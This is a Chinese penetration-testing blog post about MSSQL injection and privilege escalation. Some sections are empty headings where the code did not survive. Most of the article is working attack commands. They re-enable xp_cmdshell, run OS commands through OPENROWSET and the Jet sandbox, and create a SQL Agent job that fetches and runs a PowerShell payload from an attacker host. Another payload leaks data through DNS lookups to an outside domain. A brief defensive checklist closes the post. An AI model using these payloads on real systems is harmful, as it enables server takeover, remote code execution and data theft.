【SQL注入技巧拓展】————8、MSSQL 注入攻击与防御

最新推荐文章于 2023-03-10 19:35:15 发布
最新推荐文章于 2023-03-10 19:35:15 发布
阅读量867 收藏 2
点赞数
分类专栏: 【渗透测试拓展】 # SQL注入拓展

本文所用数据库涉及SQL Server 2k5,2k8,2k12,其次对于绕过姿势和前文并无太大差别,就不做过多的讲解,主要放在后面的提权上

系统库

注释

实例

版本&数据库当前用户&主机名

版本

如果是2012的数据库返回为True

数据库当前用户

实例:

主机名

库&表&列

库名

获取表名

这里使用的U表示用户表,还有视图和存储过程分别表示为    U = 用户表, V = 视图 , X = 扩展存储过程

获取列名

接收多条数据

临时表

除了上述的查询方式在MSSQL中可以使用临时表来查看数据,步骤如下

//1.创建临时表/列和插入数据: BEGIN DECLARE @test varchar(8000) SET @test=':' SELECT @test=@test+' '+name FROM sysobjects WHERE xtype='U' AND name>@test SELECT @test AS test INTO TMP_DB END; //2.转储内容: SELECT TOP 1 SUBSTRING(test,1,353) FROM TMP_DB;
//3.删除表: DROP TABLE TMP_DB;

XML列数据

字符串连接符

相对于MySQL来说少了两个函数,有如下方式连接:

条件语句&时间

条件语句

 

16进制转换绕过
 

 
 
AND 1=0; DECLARE @S VARCHAR(4000) SET @S=CAST(0x44524f50205441424c4520544d505f44423b AS VARCHAR(4000)); EXEC (@S);--
 

 

MSSQL提权
 

这里先推荐一个工具PowerUpSQL,主要用于对SQL Server的攻击,还能快速清点内网中SQL Server的机器,更多的信息可以到GitHub上查看使用.
 

其次下面主要讲的一些提权姿势为存储过程提权,想要查看数据库中是否有对应的存储过程,可以用下面的语句:
 

 
 
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
 

 

或者查询对应数据库中定义的存储过程有哪些:
 

 
 
SELECT ROUTINE_CATALOG,SPECIFIC_SCHEMA,ROUTINE_NAME,ROUTINE_DEFINITION FROM MASTER.INFORMATION_SCHEMA.ROUTINES
 ORDER BY ROUTINE_NAME
 

 

推荐一篇文章,是关于证书登录提权的文章
 

xp_cmdshell
 

 
 
EXEC master.dbo.xp_cmdshell 'cmd';
 

 

最为经典的就是这个组件了,但是2005之后就默认关闭,而且现在来说都会把这个扩展删除掉
 

 

因为xp_cmdshell用得最多,这里就xp_cmdshell使用过程中可能遇到的和网上收集问题列举一下:
 

首先说明一下,下面用到的addextendedproc的时候是没有开启的,试了一些语句,下面的语句可以创建一个存储过程:
 

use master
go
create procedure sp_addextendedproc
@functname nvarchar(517),
@dllname varchar(255)
as
set implicit_transactions off
if @@trancount > 0
begin
raiserror(15002,-1,-1,'sp_addextendedproc')
return (1)
end
dbcc addextendedproc( @functname, @dllname)
return (0)
 

1. 未能找到存储过程'master..xpcmdshell'.
 

恢复方法:
 

 
 
EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll' declare @o int  EXEC sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
 

 

2. 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
 

恢复方法:
 

 
 
EXEC sp_dropextendedproc "xp_cmdshell"
 EXEC sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
 

 

3. 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
 

恢复方法:
 

 
 
exec sp_dropextendedproc 'xp_cmdshell'
 exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
 

 

4. SQL Server 阻止了对组件 'xp_cmdshell' 的 过程'sys.xp_cmdshell' 的访问,因为此组件已作为此服务器安全配置的一部分而被关闭。系统管理员可以通过使用 sp_configure 启用 'xp_cmdshell'。有关启用 'xp_cmdshell' 的详细信息,请参阅 SQL Server 联机丛书中的 "外围应用配置器"。
 

恢复方法:
 

 
 
执行:EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
 

 

xp_dirtree
 

获取文件信息,可以列举出目录下所有的文件与文件夹
 

参数说明:目录名,目录深度,是否显示文件 
 

 
 
execute master..xp_dirtree 'c:' 
 execute master..xp_dirtree 'c:',1 
 execute master..xp_dirtree 'c:',1,1
 

 

OPENROWSET
 

OPENROWSET 在MSSQL 2005及以上版本中默认是禁用的.需要先打开:
 

打开语句:
 

 

然后执行:
 

 
 
SELECT * FROM OPENROWSET('SQLOLEDB', '数据库地址';'数据库用户名';'数据库密码', 'SET FMTONLY OFF execute master..xp_cmdshell "dir"');
 

 

这种攻击是需要首先知道用户密码的.
 

沙盒
 

开启沙盒:
 

 
 
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftJet4.0Engines','SandBoxMode','REG_DWORD',1 执行命令: select * from openrowset('microsoft.jet.oledb.4.0',';database=c:windowssystem32iasdnary.mdb','select shell("whoami")')
 

 

SP_OACREATE
 

其实xp_cmdshell一般会删除掉了,如果xp_cmdshell 删除以后,可以使用SP_OACreate
 

需要注意的是这个组件是无回显的,你可以把他直接输出到web目录下的文件然后读取
 

 

下面是收集来的sp_OACreate的一些命令:
 

 

Agent Job
 

关于Agent job执行命令的这种情况是需要开启了MSSQL Agent Job服务才能执行,这里列出命令,具体的原理在安全客已经有过总结这里
 

USE msdb;
EXEC dbo.sp_add_job @job_name = N'clay_powershell_job1' ; 
EXEC sp_add_jobstep 
    @job_name = N'clay_powershell_job1', 
    @step_name = N'clay_powershell_name1', 
    @subsystem = N'PowerShell', 
    @command = N'powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(''http://Your_IP/Your_file''))"', 
    @retry_attempts = 1, 
    @retry_interval = 5;
EXEC dbo.sp_add_jobserver 
    @job_name = N'clay_powershell_job1'; 
EXEC dbo.sp_start_job N'clay_powershell_job1';
 

Else
 

MSSQL还有其他的很多存储过程可以调用,下面做一个小列举,有兴趣的朋友可以逐一研究:
 

 

下面是关于一些存储过程调用的例子:
 

 

Out-of-Band
 

关于带外注入在上一篇文章已经有讲到,但DNS注入只讲了利用,这里做了一张图为大家讲解,同样的SMB Relay Attack 也是存在的,可自行实现.
 

下图就是DNS注入中的请求过程
 

 

那么SQL Server的DNS注入和MySQl稍有不容,但都是利用了SMB协议
 

 
 
Param=1; SELECT * FROM OPENROWSET('SQLOLEDB', ({INJECT})+'.rootclay.club';'sa';'pwd', 'SELECT 1') Makes DNS resolution request to {INJECT}.rootclay.club
 

 

防御
 

对于代码上的防御在上一篇文章已有总结,就不多BB了…..这里主要说一下存储过程方面的东西
 

1. 设置TRUSTWORTHY为offALTER DATABASE master SET TRUSTWORTHY OFF
 

2. 确保你的存储过程的权限不是sysadmin权限的
 

3. 对于 PUBLIC用户是不能给存储过程权限的REVOKE EXECUTE ON 存储过程 to PUBLIC
 

4. 对于自己不需要的存储过程最好删除
 

5. 当然,在代码方面就做好防御是最好的选择,可以参见上篇文章
 

 
 

参考
 

http://www.blackhat.com/presentations/bh-europe-09/Guimaraes/Blackhat-europe-09-Damele-SQLInjection-slides.pdf 
 

http://colesec.inventedtheinternet.com/hacking-sql-server-with-xp_cmdshell/ 
 

http://www.cnblogs.com/zhycyq/articles/2658225.html 
 

https://evi1cg.me/tag/mssql/ 
 

http://404sec.lofter.com/post/1d16b278_6329f6d 

                

        

        

        

    




    

      

        

            

              
                
                  FLy_鹏程万里
                
              
            

            

                关注
              
            

        

        

          
    
            
  • 
              
                
                
                
                
                      0
                
              
              
    点赞
    
            
    • 
            
  • 
              
                
                
                
              
              
    
            
    • 
            
  • 
              
                
                
                
                
                    2
                
              
              
    
                
    
                  
                    收藏
                  
                
    
              
    
              
    
                
    
                  觉得还不错?
                  
                    一键收藏
                  
                 
                
    
              
    
            
    • 
          
  • 
            
    
              
              
            
    
              
              
              
                    0
              
            
            
    评论
    
          
    • 
          
  • 
          
    • 
          
  • 
            
              
            
              
    
            
              
                
            
    
          
    • 
        

      

      

            

                专栏目录
          










                



	

		

			

				
					
SQL注入——mssql注入

				
			

			

				

					01-19
				

			

		

		

			
				
1、Mssql权限问题 Mssql角色:     			服务器角色–针对运行整个数据库服务器设定的角色和权限。 			    			数据库角色–针对某个特定数据库设定的角色和权限。 			    固定服务器角色      			sysadmin  			  			...

			
		

	



                

              
                



	

		

			

				
					
SQLServer/MsSql注入漏洞步骤、使用方法

				
			

			

				

					weixin_46928280的博客
				

				

					07-20
					
					4504
					
				

			

		

		

			
				
msSQL/SQLserver数据库的使用方法;渗透SQLserver数据库的步骤

			
		

	



                


  
              

                


	

		

			

				
					
网络安全:SQL盲注概述

				
			

			

				

					Mr_qing的博客
				

				

					11-25
					
					1470
					
				

			

		

		

			
				
SQL注入在本节中,我们将描述什么是盲SQL注入,解释查找和利用盲SQL注入漏洞的各种技术。什么是盲SQL注入?当应用程序容易受到 SQL 注入攻击,但其 HTTP 响应不包含相关 SQL 查询的结果或任何数据库错误的详细信息时,就会出现盲 SQL 注入。对于盲 SQL 注入漏洞,许多技术(如UNION攻击)无效,因为它们依赖于能够在应用程序的响应中看到注入查询的结果。仍然可以利用盲SQL注入来访问未经授权的数据,但必须使用不同的技术。通过触发条件响应来利用盲SQL注入

			
		

	





	

		

			

				
					
sql注入一般流程(附例题)

					
热门推荐

				
			

			

				

					Battery的博客
				

				

					08-03
					
					14万+
					
				

			

		

		

			
				
在与服务器数据库进行数据交互的地方拼接了恶意的sql代码,达到欺骗服务器执行恶意代码的目的。本质上是程序把用户输入的数据当成了sql语句执行。

			
		

	



		

			
		



	

		

			

				
					
SQL Server 命令执行方式汇总

					
最新发布

				
			

			

				

					m0_60571990的博客
				

				

					03-10
					
					3409
					
				

			

		

		

			
				
SQL Server 命令执行方式汇总

			
		

	





	

		

			

				
					
SQL注入-盲注

				
			

			

				

					m0_53820621的博客
				

				

					08-12
					
					739
					
				

			

		

		

			
				
SQL注入-盲注

			
		

	





	

		

			

				
					
SQL注入攻击防御

				
			

			

				

					07-17
				

			

		

		

			
				
SQL注入是Internet上最危险、最有名的安全漏洞之一,《SQL注入攻击防御》是目前唯一一本专门致力于讲解SQL威胁的图书。《SQL注入攻击防御》作者均是专门研究SQL注入的安全专家,他们集众家之长,对应用程序的...

			
		

	





	

		

			

				
					
SQL注入攻击防御-第2版

				
			

			

				

					10-11
				

			

		

		

			
				
主要内容: ·发现、确认和自动发现SQL注入漏洞  ·通过SQL注入利用漏洞  ·在代码中发现SQL注入的方法和技巧  ·利用操作系统的漏洞  ·在代码层和平台层防御SQL注入攻击  ·确定是否已经遭到SQL注入攻击

			
		

	





	

		

			

				
					
SQL注入攻击防御  第2版》PDF版本下载.txt

				
			

			

				

					07-17
				

			

		

		

			
				
### SQL注入攻击防御知识点详解  #### 一、SQL注入概述  SQL注入是一种常见的Web应用程序安全漏洞,攻击者通过在应用程序的输入字段中插入恶意SQL语句,利用这些语句来操控数据库执行非授权操作。这种攻击方式可以...

			
		

	





	

		

			

				
					
SQL注入之盲注

				
			

			

				

					胖虎的博客
				

				

					11-15
					
					1785
					
				

			

		

		

			
				
sql注入之布尔类型的盲注,结合burpsuite工具实现半自动化

			
		

	





	

		

			

				
					
sql注入源码(mssql,mysql)

				
			

			

				

					03-15
				

			

		

		

			
				
支持mssql,mysql,列数据库,文件目录,注册表等

			
		

	





	

		

			

				
					
SQL Server注入大全及防御

				
			

			

				

					网络 人生 学习 进步
				

				

					09-17
					
					1425
					
				

			

		

		

			
				
  SQL Server是中小型网站广泛使用的数据库,由于功能强大也滋生了很多安全问题,国内又因为SQL注入攻击的很长一段时间流行,导致对SQL Server的入侵技巧也层出不穷,由于SQL Server支持多语句,相信很多小黑在对SQL Server进去SQL注入的时候很少使用猜解表名之类的方法,而直接转向使用SQL Server的存储过程和函数快速的拿权限,下面我就围绕SQL Server的系

			
		

	





	

		

			

				
					
高级的MSSQL注入技巧

				
			

			

				

					CanMeng'Blog - 一个WEB安全渗透的技术爱好者
				

				

					11-30
					
					457
					
				

			

		

		

			
				
tl;dr

本文列举了几种改进的MSSQL注入技巧,所有的攻击向量都至少在三个最新版本的Microsoft SQL Server上进行了测试:2019、2017、2016SP2。

DNS Out-of-Band

如果遇到带有禁用堆栈查询的完全盲SQL注入,则可以通过函数 fn_xe_file_target_read_file, fn_get_audit_file,和fn_trace_gettable实现DNS带外(OOB)数据泄露。
利用fn_xe_file_target_read_file()的例子

			
		

	





	

		

			

				
					
一次另类的mssql渗透之路

				
			

			

				

					include_voidmain的博客
				

				

					06-08
					
					501
					
				

			

		

		

			
				
一次另类的mssql渗透之路

			
		

	





	

		

			

				
					
利用mssql弱口令的注入以及防御(安全)

				
			

			

				

					全欣 的专栏
				

				

					03-24
					
					4695
					
				

			

		

		

			
				
原文地址:http://www.hackmvp.com/donghua/sort0114/16287.html

第一部分:猜解口令和入侵
 大家都知道1433是mssql数据库的默认端口,也都知道sa是mssql数据库的默认的管理员帐号,这个端口的入侵以前讲过许多,网上也有很多这方面的资料,下面我就根据我个人在【新世纪网安】的学习来总结一下
 
 首先,要想通过1433端口进入载有ms

			
		

	





	

		

			

				
					
MSSQL注入攻击的防护

				
			

			

				

					tankejin的专栏
				

				

					07-07
					
					1225
					
				

			

		

		

			
				
Mssql注入攻击是比较直接和危害比较大的一种攻击方式,那些所谓的黑客们能够利用它直接取得系统权限。今天我们就来看看如何通过系统设置防止这种攻击:  首先要申明的是,并不是通过这个设置就能保证你的服务器的安全,安全是一个整体,然而整体又正是由这些部分构成的! 对策一: 伪黑客:  假设这个地方可以注入 http://localhost/bbs/news.asp?id=5 我们往往采取下面这种方法来

			
		

	





	

		

			

				
					
MsSQL注入

				
			

			

				

					weixin_41970600的博客
				

				

					03-12
					
					141
					
				

			

		

		

			
				
05版本以后默认关闭禁用(因为危险)



Sysadmin扩展攻击方式:







set-executionpolicy remotesigned(在PowerShell执行该命令更改策略,方便脚本上传)




			
		

	





	

		

			

				
					
SQL注入原理及过程简单介绍

				
			

			

				

					Soda_199的博客
				

				

					08-09
					
					6353
					
				

			

		

		

			
				
1、产生SQL注入原因

       开发代码的时候没有全面考虑到网络安全性,特别是在用户交互时,没有考虑到用户提交的信息中可能破坏数据库,没有对输入的数据进行合法的过滤。SQL 注入过程目的性是非常强的,其主要目标是 Web 应用的后台数据库,从数据库中获取信息和授予较高的权限,它先破坏数据库,再对数据库服务器进行破坏。

2、SQL注入原理

首先要了解web网站的架构:

Web 网站架构...

			
		

	





	

		

			

				
					
SQL注入攻击防御:实战指南

				
			

			

				

					
				

			

		

		

			
				
"SQL注入攻击防御 (第2版),作者Justin Clarke,由施宏斌和叶愫翻译,清华大学出版社出版,属于安全技术经典译丛,讲述了关于SQL注入攻击的防范措施。"  SQL注入攻击是一种常见的网络安全威胁,它发生在攻击者通过...

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值